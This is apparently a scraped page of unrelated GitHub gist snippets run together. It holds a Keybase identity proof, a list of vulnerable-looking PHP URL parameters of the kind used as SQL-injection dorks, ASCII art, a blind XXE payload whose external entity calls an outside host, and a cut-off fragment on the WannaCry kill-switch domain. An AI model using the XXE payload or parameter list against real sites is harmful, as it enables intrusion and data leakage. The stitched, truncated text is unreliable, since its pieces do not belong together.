I hereby claim:
- I am Xennials on github.
- I am black_soap (https://keybase.io/black_soap) on keybase.
- I have a public key whose fingerprint is 3E74 0CB6 3105 3FCA 3985 E32A BB97 ACB0 4F77 87D1
To claim this, I am signing this object:
trainers.php?id= | |
play_old.php?id= | |
declaration_more.php?decl_id= | |
Pageid= | |
games.php?id= | |
newsDetail.php?id= | |
staff_id= | |
historialeer.php?num= | |
product-item.php?id= | |
news_view.php?id= |
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | |
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX | |
XX XX | |
XX MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM XX | |
XX MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM XX | |
XX MMMMMMMMMMMMMMMMss''' '''ssMMMMMMMMMMMMMMMM XX | |
XX MMMMMMMMMMMMyy'' ''yyMMMMMMMMMMMM XX | |
XX MMMMMMMMyy'' ''yyMMMMMMMM XX | |
XX MMMMMy'' ''yMMMMM XX | |
XX MMMy' 'yMMM XX |
I hereby claim:
To claim this, I am signing this object:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. UPDATE: There is apparently a sample out there now which does not include the killswitch via @JR0driguezBSECURITY BULLETIN AND UPDATES HERE: https://technet.